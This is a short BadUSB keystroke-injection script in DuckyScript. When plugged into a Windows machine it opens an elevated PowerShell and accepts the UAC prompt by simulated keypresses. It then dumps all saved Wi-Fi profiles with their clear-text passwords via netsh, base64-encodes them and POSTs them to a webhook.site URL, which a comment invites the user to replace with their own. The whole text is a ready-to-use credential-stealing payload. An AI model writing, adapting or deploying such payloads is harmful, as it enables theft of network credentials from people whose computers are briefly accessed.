ID 05ac:021e
DELAY 2000
GUI r
DELAY 500
STRING powershell
CTRL SHIFT ENTER
DELAY 1500
LEFT
ENTER
DELAY 1500
REM Please enter instead of https://webhook.site/1a883927-dc3b-409e-8446-d20e7c0e7fc3 your own webhook
STRING $wifi = (netsh wlan show profiles | Where-Object { $_ -match ':\s+(.+)$' } | ForEach-Object { $n = $matches[1].Trim(); netsh wlan show profiles name="$n" key=clear } | Out-String); $b64 = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($wifi)); Invoke-WebRequest -Uri "https://webhook.site/1a883927-dc3b-409e-8446-d20e7c0e7fc3" -Method Post -Body $b64 -UseBasicParsing
ENTER
DELAY 1000
STRING exit
ENTER
